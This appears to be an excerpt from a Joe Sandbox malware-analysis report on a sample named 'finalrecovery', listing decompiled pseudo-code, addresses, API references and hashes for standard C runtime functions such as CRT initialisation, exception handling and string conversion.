0x10009123
0x1000911f
0x10009129
0x10009134
0x10009137
0x10009138
0x1000913a
0x100091a2
0x100091a2
0x00000000
0x1000913c
0x1000913c
0x1000913e
0x10009140
0x10009192
0x10009194
0x1000919a
0x00000000
0x10009142
0x10009142
0x10009145
0x10009145
0x10009147
0x10009147
0x10009147
0x1000914a
0x1000914a
0x1000914c
0x1000914d
0x1000914d
0x10009155
0x10009159
0x10009163
0x10009166
0x1000916b
0x1000916e
0x10009172
0x00000000
0x10009174
0x1000917c
0x10009181
0x10009184
0x10009186
0x100091a7
0x100091a9
0x100091aa
0x100091ab
0x100091ac
0x100091ad
0x100091ae
0x100091b3
0x100091b4
0x100091b9
0x100091bf
0x100091c1
0x100091c2
0x100091c8
0x00000000
0x100091c8
0x100091cd
0x00000000
0x00000000
0x00000000
0x10009186
0x00000000
0x10009188
0x10009188
0x1000918b
0x1000918d
0x1000918d
0x00000000
0x10009191
0x10009140
0x10009112
0x10009112
0x10009112
0x10009114
0x10009116
0x10009116
0x100090a1
0x100090b2
0x100090b6
0x100090c2
0x100090c4
0x100090c6
0x100090cb
0x100090cb
0x100090ce
0x100090ce
0x00000000
0x100090c4
0x1000909f
0x1000908c
0x1000906a
0x10008fc4
0x10008fc0
0x10008f1f
0x10008f1f
0x10008f22
0x10008f40
0x10008f40
0x10008f43
0x10008f56
0x10008f5b
0x10008f60
0x10008f63
0x10008f69
0x100090e8
0x100090e8
0x100090e8
0x00000000
0x10008f6f
0x10008f6f
0x10008f75
0x00000000
0x10008f77
0x10008f81
0x10008f86
0x10008f8b
0x10008f8e
0x10008f94
0x00000000
0x00000000
0x00000000
0x00000000
0x10008f94
0x10008f75
0x10008f45
0x10008f45
0x100090eb
0x100090ec
0x100090f3
0x00000000
0x100090f5
0x10008f24
0x10008f24
0x10008f2a
0x00000000
0x10008f2c
0x10008f31
0x10008f33
0x00000000
0x10008f39
0x10008f39
0x00000000
0x10008f39
0x10008f33
0x10008f2a
0x10008f22
0x10008f1d
0x10008f04
0x10008ed6
0x10008ed6
0x10008edb
0x10008ee1
0x100090f6
0x100090f8
0x100090f8
0x00000000

APIs

___from_strstr_to_strchr.LIBCMT ref: 10008EF0
_free.LIBCMT ref: 10008FC9
_free.LIBCMT ref: 10008FF6

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 890de65a0d0e87214858fd98b9d4a9d6920ab5d2b586cb09b9dc4dd833760745
Instruction ID: fda501ef574866cedc08530c1c1b2566ce136608b6a2a094c61311dcb6afabeb
Opcode Fuzzy Hash: 890de65a0d0e87214858fd98b9d4a9d6920ab5d2b586cb09b9dc4dd833760745
Instruction Fuzzy Hash: ED510775D04356AFFB10DF748C81A6E7BE5FF053D0F0181AAE9449718AEB769A00C751

Uniqueness

Uniqueness Score: -1.00%

Function 0040E955 Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0040E99E
__alloca_probe_16.LIBCMT ref: 0040E9CA
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0040EA09
LCMapStringEx.KERNEL32 ref: 0040EA26
LCMapStringEx.KERNEL32 ref: 0040EA65
__alloca_probe_16.LIBCMT ref: 0040EA82
LCMapStringEx.KERNEL32 ref: 0040EAC4
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040EAE7

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 1fc6cf8d2a8d1d5f718579b7e7bb49a2a122a8ef86af5ea5955cff814221f249
Instruction ID: 9d634b0f5ff269f644eeb36f9fdec62c5a34c9f1a9217affe883591534b7aca6
Opcode Fuzzy Hash: 1fc6cf8d2a8d1d5f718579b7e7bb49a2a122a8ef86af5ea5955cff814221f249
Instruction Fuzzy Hash: 3F519372600216ABDB209F56CC45FAB7BB9EB44740F15483AF905F62D0D778DC21DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 1000287C Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E1000287C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t42;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t58;
				void* _t61;
				void* _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t82;

				_t68 = __edx;
				_push(0x10);
				_push(0x10015730);
				E10003100(__ebx, __edi, __esi);
				_t34 =  *0x10017968; // 0x1
				if(_t34 > 0) {
					 *0x10017968 = _t34 - 1;
					 *(_t82 - 0x1c) = 1;
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					 *((char*)(_t82 - 0x20)) = E10002CE6();
					 *(_t82 - 4) = 1;
					__eflags =  *0x10017ca8 - 2;
					if( *0x10017ca8 != 2) {
						E10002F80(_t68, 1, __esi, 7);
						asm("int3");
						_push(0xc);
						_push(0x10015758);
						E10003100(__ebx, 1, __esi);
						_t72 =  *(_t82 + 0xc);
						__eflags = _t72;
						if(_t72 != 0) {
							L9:
							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
							__eflags = _t72 - 1;
							if(_t72 == 1) {
								L12:
								_t58 =  *(_t82 + 0x10);
								_t76 = E10002A37( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
								 *(_t82 - 0x1c) = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t76 = E10002722(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t76;
									if(_t76 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t72 - 2;
								if(_t72 == 2) {
									goto L12;
								} else {
									_t58 =  *(_t82 + 0x10);
									L14:
									_push(_t58);
									_push(_t72);
									_push( *((intOrPtr*)(_t82 + 8)));
									_t42 = E10001000();
									_t76 = _t42;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										__eflags = _t76;
										if(_t76 == 0) {
											_push(_t58);
											_push(_t42);
											_push( *((intOrPtr*)(_t82 + 8)));
											_t45 = E10001000();
											__eflags = _t58;
											_t25 = _t58 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E1000287C(_t58, _t68, _t72, _t76, _t25);
											_pop(_t61);
											E10002A37( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
										}
									}
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t76 = E10002722(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
										 *(_t82 - 0x1c) = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											_t76 = E10002A37( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
											 *(_t82 - 0x1c) = _t76;
										}
									} else {
										__eflags = _t72 - 3;
										if(_t72 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t82 - 4) = 0xfffffffe;
							_t40 = _t76;
						} else {
							__eflags =  *0x10017968 - _t72; // 0x1
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
						return _t40;
					} else {
						E10002DB1(__ebx, _t61, 1, __esi);
						E10002C6D();
						E100030CF();
						 *0x10017ca8 =  *0x10017ca8 & 0x00000000;
						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
						E10002911();
						_t54 = E10002F52( *((intOrPtr*)(_t82 + 8)), 0);
						asm("sbb esi, esi");
						_t80 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t80;
						 *(_t82 - 0x1c) = _t80;
						 *(_t82 - 4) = 0xfffffffe;
						E1000291E();
						_t56 = _t80;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
					return _t56;
				}
			}

0x1000287c
0x1000287c
0x1000287e
0x10002883
0x10002888
0x1000288f
0x10002896
0x1000289e
0x100028a1
0x100028aa
0x100028ad
0x100028b0
0x100028b7
0x10002926
0x1000292b
0x1000292c
0x1000292e
0x10002933
0x10002938
0x1000293b
0x1000293d
0x1000294e
0x1000294e
0x10002952
0x10002955
0x10002961
0x10002961
0x1000296e
0x10002970
0x10002973
0x10002975
0x10002985
0x10002987
0x1000298a
0x1000298c
0x00000000
0x00000000
0x1000298c
0x10002957
0x10002957
0x1000295a
0x00000000
0x1000295c
0x1000295c
0x10002992
0x10002992
0x10002993
0x10002994
0x10002997
0x1000299c
0x1000299e
0x100029a1
0x100029a4
0x100029a6
0x100029a8
0x100029aa
0x100029ab
0x100029ac
0x100029af
0x100029b4
0x100029b6
0x100029b6
0x100029bc
0x100029bd
0x100029c2
0x100029c8
0x100029c8
0x100029a8
0x100029cd
0x100029cf
0x100029d6
0x100029e0
0x100029e2
0x100029e5
0x100029e7
0x100029f3
0x10002a1b
0x10002a1b
0x100029d1
0x100029d1
0x100029d4
0x00000000
0x00000000
0x100029d4
0x100029cf
0x1000295a
0x10002a1e
0x10002a25
0x1000293f
0x1000293f
0x10002945
0x00000000
0x10002947
0x10002947
0x10002947
0x10002945
0x10002a2a
0x10002a36
0x100028b9
0x100028b9
0x100028be
0x100028c3
0x100028c8
0x100028cf
0x100028d3
0x100028dd
0x100028e9
0x100028eb
0x100028eb
0x100028ed
0x100028f0
0x100028f7
0x100028fc
0x00000000
0x100028fc
0x10002891
0x10002891
0x100028fe
0x10002901
0x1000290d
0x1000290d

APIs

__RTC_Initialize.LIBCMT ref: 100028C3
___scrt_uninitialize_crt.LIBCMT ref: 100028DD

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 42806aad56cbe77a1b5bb2d2a40157ee08dc98f2d8d462a07195d03710336d9d
Instruction ID: ac62ab2a2a1dbb9d974ad498b0db7c1921e8f49f2df0d7a9b05f4eea38b59fbd
Opcode Fuzzy Hash: 42806aad56cbe77a1b5bb2d2a40157ee08dc98f2d8d462a07195d03710336d9d
Instruction Fuzzy Hash: 0B41D376E04269EFFB21CF54CC41BAE7BB5EB446E0F118129F8486B259DB309D41DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0043EA60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0043EA97
___except_validate_context_record.LIBVCRUNTIME ref: 0043EA9F
_ValidateLocalCookies.LIBCMT ref: 0043EB28
__IsNonwritableInCurrentImage.LIBCMT ref: 0043EB53
_ValidateLocalCookies.LIBCMT ref: 0043EBA8

Strings

csm, xrefs: 0043EB3D

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 97abf38324731e32aa54c8af95c8715b679c63eee41a74b9c7ea5a5f1bcbe85c
Instruction ID: 56324905b5cf03f36623b407c9bca58900183bbae34251306b30c85aa47bf572
Opcode Fuzzy Hash: 97abf38324731e32aa54c8af95c8715b679c63eee41a74b9c7ea5a5f1bcbe85c
Instruction Fuzzy Hash: A941EB30A01208EBCF10DF6AC885A9EBBB1FF4C318F14915AE8155B3D2C779E911CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00411B60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00411B60(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _t56;
				signed int _t63;
				intOrPtr _t64;
				void* _t65;
				intOrPtr* _t66;
				intOrPtr _t68;
				intOrPtr _t70;
				signed int _t71;
				signed int _t72;
				signed int _t75;
				intOrPtr* _t79;
				intOrPtr _t80;
				signed int _t84;
				char _t86;
				intOrPtr _t90;
				intOrPtr* _t91;
				signed int _t97;
				signed int _t98;
				intOrPtr _t100;
				intOrPtr _t103;
				signed int _t105;
				void* _t108;
				void* _t109;
				void* _t115;

				_t94 = __edx;
				_t79 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t79 = E0042C16E(__ecx,  *_t79);
				_t80 = _a8;
				_t6 = _t80 + 0x10; // 0x11
				_t103 = _t6;
				_push(_t103);
				_v20 = _t103;
				_v12 =  *(_t80 + 8) ^  *0x43d054;
				E00411B20(_t80, __edx, __edi, _t103,  *(_t80 + 8) ^  *0x43d054);
				E00412BBC(_a12);
				_t56 = _a4;
				_t109 = _t108 + 0x10;
				_t100 =  *((intOrPtr*)(_t80 + 0xc));
				if(( *(_t56 + 4) & 0x00000066) != 0) {
					__eflags = _t100 - 0xfffffffe;
					if(_t100 != 0xfffffffe) {
						_t94 = 0xfffffffe;
						E00412EE0(_t80, 0xfffffffe, _t103, 0x43d054);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t56;
					_v28 = _a12;
					 *((intOrPtr*)(_t80 - 4)) =  &_v32;
					if(_t100 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t84 = _v12;
							_t63 = _t100 + (_t100 + 2) * 2;
							_t80 =  *((intOrPtr*)(_t84 + _t63 * 4));
							_t64 = _t84 + _t63 * 4;
							_t85 =  *((intOrPtr*)(_t64 + 4));
							_v24 = _t64;
							if( *((intOrPtr*)(_t64 + 4)) == 0) {
								_t86 = _v5;
								goto L7;
							} else {
								_t94 = _t103;
								_t65 = E00412E80(_t85, _t103);
								_t86 = 1;
								_v5 = 1;
								_t115 = _t65;
								if(_t115 < 0) {
									_v16 = 0;
									L13:
									_push(_t103);
									E00411B20(_t80, _t94, _t100, _t103, _v12);
									goto L14;
								} else {
									if(_t115 > 0) {
										_t66 = _a4;
										__eflags =  *_t66 - 0xe06d7363;
										if( *_t66 == 0xe06d7363) {
											__eflags =  *0x42f198;
											if(__eflags != 0) {
												_t75 = E0042BB70(__eflags, 0x42f198);
												_t109 = _t109 + 4;
												__eflags = _t75;
												if(_t75 != 0) {
													_t105 =  *0x42f198; // 0x40ff75
													 *0x42e234(_a4, 1);
													 *_t105();
													_t103 = _v20;
													_t109 = _t109 + 8;
												}
												_t66 = _a4;
											}
										}
										_t95 = _t66;
										E00412EC0(_t66, _a8, _t66);
										_t68 = _a8;
										__eflags =  *((intOrPtr*)(_t68 + 0xc)) - _t100;
										if( *((intOrPtr*)(_t68 + 0xc)) != _t100) {
											_t95 = _t100;
											E00412EE0(_t68, _t100, _t103, 0x43d054);
											_t68 = _a8;
										}
										_push(_t103);
										 *((intOrPtr*)(_t68 + 0xc)) = _t80;
										E00411B20(_t80, _t95, _t100, _t103, _v12);
										E00412EA0();
										asm("int3");
										_t70 = _v40;
										_t90 = _v36;
										__eflags = _t70 - _t90;
										if(_t70 != _t90) {
											_t91 = _t90 + 5;
											_t71 = _t70 + 5;
											__eflags = _t71;
											while(1) {
												_t97 =  *_t71;
												__eflags = _t97 -  *_t91;
												if(_t97 !=  *_t91) {
													break;
												}
												__eflags = _t97;
												if(_t97 == 0) {
													goto L24;
												} else {
													_t98 =  *((intOrPtr*)(_t71 + 1));
													__eflags = _t98 -  *((intOrPtr*)(_t91 + 1));
													if(_t98 !=  *((intOrPtr*)(_t91 + 1))) {
														break;
													} else {
														_t71 = _t71 + 2;
														_t91 = _t91 + 2;
														__eflags = _t98;
														if(_t98 != 0) {
															continue;
														} else {
															goto L24;
														}
													}
												}
												goto L32;
											}
											asm("sbb eax, eax");
											_t72 = _t71 | 0x00000001;
											__eflags = _t72;
											return _t72;
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L32;
							L7:
							_t100 = _t80;
						} while (_t80 != 0xfffffffe);
						if(_t86 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L32:
			}

0x00411b60
0x00411b67
0x00411b6b
0x00411b6c
0x00411b72
0x00411b7e
0x00411b80
0x00411b86
0x00411b86
0x00411b8f
0x00411b91
0x00411b94
0x00411b97
0x00411b9f
0x00411ba4
0x00411ba7
0x00411baa
0x00411bb1
0x00411c0d
0x00411c10
0x00411c18
0x00411c1f
0x00000000
0x00411c1f
0x00000000
0x00411bb3
0x00411bb3
0x00411bb9
0x00411bbf
0x00411bc5
0x00411c30
0x00411c39
0x00411bc7
0x00411bc7
0x00411bc7
0x00411bcd
0x00411bd0
0x00411bd3
0x00411bd6
0x00411bd9
0x00411bde
0x00411bf4
0x00000000
0x00411be0
0x00411be0
0x00411be2
0x00411be7
0x00411be9
0x00411bec
0x00411bee
0x00411c04
0x00411c24
0x00411c24
0x00411c28
0x00000000
0x00411bf0
0x00411bf0
0x00411c3a
0x00411c3d
0x00411c43
0x00411c45
0x00411c4c
0x00411c53
0x00411c58
0x00411c5b
0x00411c5d
0x00411c5f
0x00411c6c
0x00411c72
0x00411c74
0x00411c77
0x00411c77
0x00411c7a
0x00411c7a
0x00411c4c
0x00411c80
0x00411c82
0x00411c87
0x00411c8a
0x00411c8d
0x00411c95
0x00411c99
0x00411c9e
0x00411c9e
0x00411ca1
0x00411ca5
0x00411ca8
0x00411cb8
0x00411cbd
0x00411cc1
0x00411cc4
0x00411cc7
0x00411cc9
0x00411ccf
0x00411cd2
0x00411cd2
0x00411cd5
0x00411cd5
0x00411cd7
0x00411cd9
0x00000000
0x00000000
0x00411cdb
0x00411cdd
0x00000000
0x00411cdf
0x00411cdf
0x00411ce2
0x00411ce5
0x00000000
0x00411ce7
0x00411ce7
0x00411cea
0x00411ced
0x00411cef
0x00000000
0x00411cf1
0x00000000
0x00411cf1
0x00411cef
0x00411ce5
0x00000000
0x00411cdd
0x00411cf3
0x00411cf5
0x00411cf5
0x00411cf9
0x00411ccb
0x00411ccb
0x00411ccb
0x00411cce
0x00411cce
0x00411bf2
0x00000000
0x00411bf2
0x00411bf0
0x00411bee
0x00000000
0x00411bf7
0x00411bf7
0x00411bf9
0x00411c00
0x00000000
0x00411c02
0x00000000
0x00411c00
0x00411bc5
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 00411B97
___except_validate_context_record.LIBVCRUNTIME ref: 00411B9F
_ValidateLocalCookies.LIBCMT ref: 00411C28
__IsNonwritableInCurrentImage.LIBCMT ref: 00411C53
_ValidateLocalCookies.LIBCMT ref: 00411CA8

Strings

csm, xrefs: 00411C3D

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: e0701a756b8fd532e6c54edd9633cc2f37b64c963fcb2cfba846efdf3320919d
Instruction ID: 5efb2583636d31c060f413daa3c9ac420c976735102ef261660c32dbd26c5d8c
Opcode Fuzzy Hash: e0701a756b8fd532e6c54edd9633cc2f37b64c963fcb2cfba846efdf3320919d
Instruction Fuzzy Hash: 3041F930A002089BCF10DF69C840ADEBBB1AF05318F54805BE9149B361E779E995CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 100039C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E100039C0(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _t56;
				signed int _t63;
				intOrPtr _t64;
				void* _t65;
				intOrPtr* _t66;
				intOrPtr _t68;
				intOrPtr _t70;
				signed int _t71;
				signed int _t72;
				signed int _t75;
				intOrPtr* _t79;
				intOrPtr _t80;
				signed int _t84;
				char _t86;
				intOrPtr _t90;
				intOrPtr* _t91;
				signed int _t97;
				signed int _t98;
				intOrPtr _t100;
				intOrPtr _t103;
				signed int _t105;
				void* _t108;
				void* _t109;
				void* _t115;

				_t94 = __edx;
				_t79 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t79 = E1000FA3C(__ecx,  *_t79);
				_t80 = _a8;
				_t6 = _t80 + 0x10; // 0x11
				_t103 = _t6;
				_push(_t103);
				_v20 = _t103;
				_v12 =  *(_t80 + 8) ^  *0x10017004;
				E10003980(_t80, __edx, __edi, _t103,  *(_t80 + 8) ^  *0x10017004);
				E10004BFC(_a12);
				_t56 = _a4;
				_t109 = _t108 + 0x10;
				_t100 =  *((intOrPtr*)(_t80 + 0xc));
				if(( *(_t56 + 4) & 0x00000066) != 0) {
					__eflags = _t100 - 0xfffffffe;
					if(_t100 != 0xfffffffe) {
						_t94 = 0xfffffffe;
						E10004D80(_t80, 0xfffffffe, _t103, 0x10017004);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t56;
					_v28 = _a12;
					 *((intOrPtr*)(_t80 - 4)) =  &_v32;
					if(_t100 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t84 = _v12;
							_t63 = _t100 + (_t100 + 2) * 2;
							_t80 =  *((intOrPtr*)(_t84 + _t63 * 4));
							_t64 = _t84 + _t63 * 4;
							_t85 =  *((intOrPtr*)(_t64 + 4));
							_v24 = _t64;
							if( *((intOrPtr*)(_t64 + 4)) == 0) {
								_t86 = _v5;
								goto L7;
							} else {
								_t94 = _t103;
								_t65 = E10004D20(_t85, _t103);
								_t86 = 1;
								_v5 = 1;
								_t115 = _t65;
								if(_t115 < 0) {
									_v16 = 0;
									L13:
									_push(_t103);
									E10003980(_t80, _t94, _t100, _t103, _v12);
									goto L14;
								} else {
									if(_t115 > 0) {
										_t66 = _a4;
										__eflags =  *_t66 - 0xe06d7363;
										if( *_t66 == 0xe06d7363) {
											__eflags =  *0x1001021c;
											if(__eflags != 0) {
												_t75 = E1000E730(__eflags, 0x1001021c);
												_t109 = _t109 + 4;
												__eflags = _t75;
												if(_t75 != 0) {
													_t105 =  *0x1001021c; // 0x100036df
													 *0x10010164(_a4, 1);
													 *_t105();
													_t103 = _v20;
													_t109 = _t109 + 8;
												}
												_t66 = _a4;
											}
										}
										_t95 = _t66;
										E10004D60(_t66, _a8, _t66);
										_t68 = _a8;
										__eflags =  *((intOrPtr*)(_t68 + 0xc)) - _t100;
										if( *((intOrPtr*)(_t68 + 0xc)) != _t100) {
											_t95 = _t100;
											E10004D80(_t68, _t100, _t103, 0x10017004);
											_t68 = _a8;
										}
										_push(_t103);
										 *((intOrPtr*)(_t68 + 0xc)) = _t80;
										E10003980(_t80, _t95, _t100, _t103, _v12);
										E10004D40();
										asm("int3");
										_t70 = _v40;
										_t90 = _v36;
										__eflags = _t70 - _t90;
										if(_t70 != _t90) {
											_t91 = _t90 + 5;
											_t71 = _t70 + 5;
											__eflags = _t71;
											while(1) {
												_t97 =  *_t71;
												__eflags = _t97 -  *_t91;
												if(_t97 !=  *_t91) {
													break;
												}
												__eflags = _t97;
												if(_t97 == 0) {
													goto L24;
												} else {
													_t98 =  *((intOrPtr*)(_t71 + 1));
													__eflags = _t98 -  *((intOrPtr*)(_t91 + 1));
													if(_t98 !=  *((intOrPtr*)(_t91 + 1))) {
														break;
													} else {
														_t71 = _t71 + 2;
														_t91 = _t91 + 2;
														__eflags = _t98;
														if(_t98 != 0) {
															continue;
														} else {
															goto L24;
														}
													}
												}
												goto L32;
											}
											asm("sbb eax, eax");
											_t72 = _t71 | 0x00000001;
											__eflags = _t72;
											return _t72;
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L32;
							L7:
							_t100 = _t80;
						} while (_t80 != 0xfffffffe);
						if(_t86 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L32:
			}

0x100039c0
0x100039c7
0x100039cb
0x100039cc
0x100039d2
0x100039de
0x100039e0
0x100039e6
0x100039e6
0x100039ef
0x100039f1
0x100039f4
0x100039f7
0x100039ff
0x10003a04
0x10003a07
0x10003a0a
0x10003a11
0x10003a6d
0x10003a70
0x10003a78
0x10003a7f
0x00000000
0x10003a7f
0x00000000
0x10003a13
0x10003a13
0x10003a19
0x10003a1f
0x10003a25
0x10003a90
0x10003a99
0x10003a27
0x10003a27
0x10003a27
0x10003a2d
0x10003a30
0x10003a33
0x10003a36
0x10003a39
0x10003a3e
0x10003a54
0x00000000
0x10003a40
0x10003a40
0x10003a42
0x10003a47
0x10003a49
0x10003a4c
0x10003a4e
0x10003a64
0x10003a84
0x10003a84
0x10003a88
0x00000000
0x10003a50
0x10003a50
0x10003a9a
0x10003a9d
0x10003aa3
0x10003aa5
0x10003aac
0x10003ab3
0x10003ab8
0x10003abb
0x10003abd
0x10003abf
0x10003acc
0x10003ad2
0x10003ad4
0x10003ad7
0x10003ad7
0x10003ada
0x10003ada
0x10003aac
0x10003ae0
0x10003ae2
0x10003ae7
0x10003aea
0x10003aed
0x10003af5
0x10003af9
0x10003afe
0x10003afe
0x10003b01
0x10003b05
0x10003b08
0x10003b18
0x10003b1d
0x10003b21
0x10003b24
0x10003b27
0x10003b29
0x10003b2f
0x10003b32
0x10003b32
0x10003b35
0x10003b35
0x10003b37
0x10003b39
0x00000000
0x00000000
0x10003b3b
0x10003b3d
0x00000000
0x10003b3f
0x10003b3f
0x10003b42
0x10003b45
0x00000000
0x10003b47
0x10003b47
0x10003b4a
0x10003b4d
0x10003b4f
0x00000000
0x10003b51
0x00000000
0x10003b51
0x10003b4f
0x10003b45
0x00000000
0x10003b3d
0x10003b53
0x10003b55
0x10003b55
0x10003b59
0x10003b2b
0x10003b2b
0x10003b2b
0x10003b2e
0x10003b2e
0x10003a52
0x00000000
0x10003a52
0x10003a50
0x10003a4e
0x00000000
0x10003a57
0x10003a57
0x10003a59
0x10003a60
0x00000000
0x10003a62
0x00000000
0x10003a60
0x10003a25
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 100039F7
___except_validate_context_record.LIBVCRUNTIME ref: 100039FF
_ValidateLocalCookies.LIBCMT ref: 10003A88
__IsNonwritableInCurrentImage.LIBCMT ref: 10003AB3
_ValidateLocalCookies.LIBCMT ref: 10003B08

Strings

csm, xrefs: 10003A9D

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: f899cb42e9319c3274a5436605d638e6e2b8aa92804b4768c09d7e2386720e26
Instruction ID: 073c51cd0f09129959f3a06710b22616025c57061756d9f058674ae72899189a
Opcode Fuzzy Hash: f899cb42e9319c3274a5436605d638e6e2b8aa92804b4768c09d7e2386720e26
Instruction Fuzzy Hash: A841A434A002199BDB02CF68C884A9FBBF9EF463A4F11C055F9596B356DB31EA05CB91

Uniqueness

Uniqueness Score: -1.00%

